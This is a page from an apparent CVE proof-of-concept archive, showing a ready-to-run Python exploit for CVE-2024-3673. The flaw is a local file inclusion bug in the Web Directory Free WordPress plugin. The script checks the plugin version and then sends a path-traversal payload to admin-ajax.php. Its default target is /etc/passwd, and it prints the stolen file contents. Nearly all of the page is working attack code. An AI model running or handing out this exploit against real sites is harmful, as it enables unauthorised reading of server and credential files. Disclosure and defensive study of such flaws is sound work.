4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-3673
README.md
Rendering markdown...
POC / CVE-2024-3673.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import re
import requests
from packaging import version



## Exploit script written by Nxploit | Khaled_alenazi



def get_plugin_version(url: str) -> str:
    version_url = f"{url}/wp-content/plugins/web-directory-free/readme.txt"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    try:
        response = requests.get(version_url, headers=headers, verify=False, timeout=10)
        response.raise_for_status()
        match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
        if match:
            return match.group(1)
        else:
            print("Could not find version information in readme.txt.")
            return None
    except requests.RequestException as e:
        print(f"Error fetching version info: {e}")
        return None

def is_vulnerable(version_str: str) -> bool:
    vulnerable_version = "1.7.2"
    return version.parse(version_str) <= version.parse(vulnerable_version)

def exploit_vulnerability(url: str, target_file: str) -> None:
    exploit_path = f"{url}/wp-admin/admin-ajax.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    payload = f"from_set_ajax=1&action=w2dc_controller_request&template={target_file}"

    try:
        response = requests.post(exploit_path, headers=headers, data=payload, verify=False, timeout=10)
        response.raise_for_status()
        if "root:" in response.text:
            print("Exploit successful. Extracted content:")
            print(response.text)
        else:
            print("Exploit failed or the server is not vulnerable.")
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")

def main() -> None:
    parser = argparse.ArgumentParser(description="The Web Directory Free WordPress plugin before version 1.7.3 does not validate a parameter before using it in an `include()` function, which could lead to Local File Inclusion (LFI) vulnerabilities.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("--file", "-f", default="../../../../../etc/passwd", help="Target file to read (default: ../../../../../etc/passwd)")
    args = parser.parse_args()

    requests.packages.urllib3.disable_warnings()

    print("Checking if the site is vulnerable...")
    plugin_version = get_plugin_version(args.url)
    if plugin_version and is_vulnerable(plugin_version):
        print("The site is vulnerable. Attempting to exploit the vulnerability...")
        exploit_vulnerability(args.url, args.file)
    else:
        print("The site is not vulnerable. Exploitation will not proceed.")

if __name__ == "__main__":
    main()